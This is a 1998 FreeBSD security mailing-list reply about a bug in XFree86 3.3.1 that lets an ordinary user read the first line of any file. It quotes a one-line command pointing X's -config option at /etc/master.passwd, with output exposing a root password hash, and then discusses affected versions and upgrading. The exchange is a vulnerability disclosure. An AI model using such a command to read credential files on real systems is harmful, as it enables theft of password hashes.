Date:      Fri, 16 Oct 1998 22:42:29 +1300 (NZDT)
From:      Andrew McNaughton <andrew@squiz.co.nz>
To:        "Jan B. Koum " <jkb@best.com>
Cc:        security@FreeBSD.ORG
Subject:   Re: X allows ordinary user to read first line of any file
Message-ID:  <Pine.BSF.4.01.9810162230150.706-100000@aniwa.sky>
In-Reply-To: <19981016022311.A753@best.com>

On Fri, 16 Oct 1998, Jan B. Koum  wrote:

> On Fri, Oct 16, 1998 at 06:08:02PM +1300, Andrew McNaughton <andrew@squiz.co.nz> wrote:
> > 
> > found this on http://www.hoobie.net/security/exploits/
> > 
> > joeuser@host$ X -config /etc/master.passwd
> > Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
> > use: X [:<display>] [option]
> 
>         I am sure something will correct me, but I think you are running
>         the 3.3.1 version which is vulnerable I guess. It is old. You should
>         really upgrade. The new release doesn't even have the -config       
>         options as far as I can tell:                                       
> 
> % bin/XF86_SVGA -version
> [...]                   
> XFree86 Version 3.3.2.3 / X Window System
> Operating System: FreeBSD 3.0-CURRENT i386 [ELF]
> [...]
> % bin/XF86_SVGA -config /etc/master.passwd
> bin/XF86_SVGA -config /etc/master.passwd
> Unrecognized option: -config            
> 
>         I am not sure if 3.0 will ship with 3.3.2.3 - Jordan?
> 
>         I myself use XiG product (hence limited knowledge of XFree86) and
>         that also seems fine at first glance.
> 
>         BTW, wouldn't you kind of consider this to be a bug in XFree86 rather
>         than a bug in FreeBSD OS? :)

Yes it is 3.3.1, and yes the problem is with XFree86 rather than FreeBSD
itself. XFree86 came with my version of FreeBSD 2.2.5.  Perhaps that's old
enough to let it go, but this list regularly seems to cover software used
by FreeBSD users outside of the operating system itself.  Seemed worth a
comment.

What version of XFree86 is in the latest 2.2-STABLE?

Andrew

